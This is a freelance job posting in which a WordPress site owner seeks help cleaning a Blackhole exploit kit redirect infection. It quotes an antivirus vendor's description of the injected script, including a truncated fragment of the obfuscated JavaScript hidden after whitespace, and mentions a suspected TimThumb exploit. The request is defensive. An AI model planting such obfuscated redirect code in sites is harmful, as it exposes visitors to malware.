Clean Blackhole Exploit Kit (Malware Rediret) From WP Website and Resecure it
$30-100 USD
Cancelled
Posted about 12 years ago
$30-100 USD
Paid on delivery
Hello Workers.
I manage a site in wordpress, avg antivirus recently reported an infected website alert (black hole exploit kit - redirect malware).
I have reviewed the site with other antivirus like ESET, Norton and Kaspersky but do not generate alerts.
I contacted support avg and this was what they said
"[login to view URL] has been reviewed and we can confirm that the detection is correct.
This WordPress site has been modified to include a Blackhole-encrypted script which invisibly redirects to a malware server.
The script starts out, after a LARGE amount of white-space, up towards the top of the home page, looking something like:
<script type='text/javascript'>var a=!1;m_g = "\x6C\x6F\x6E\x6C\x79";if(![login to view URL](m_g)){aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa)
f='-29q-29q67q64q-
and so on. This script is probably being injected by maliciously modified .PHP scripts on the webserver. The entry method used originally to gain access to the webserver was possibly a vulnerability in an out-of-date PHP script included in the "website theme" WordPress theme, possibly the thumbnail resizing script (search for "TimThumb 0-day")."
If the site owner manages to clean his system of this one injection, but does not manage to also re-secure his site, he will probably be re-exploited in short order.
## Deliverables
* * *This broadcast message was sent to all bidders on Tuesday Mar 6, 2012 11:45:16 AM:
drluisbarrios changed the ExpertRating requirements on this project from:
SQL Test
MS SQL Server 2000 Test
MS SQL Server 2005 Test
Antispam and Antivirus Test
WordPress Test
WordPress 2.8 Test
To:
SQL Test
Antispam and Antivirus Test
WordPress Test
WordPress 2.8 Test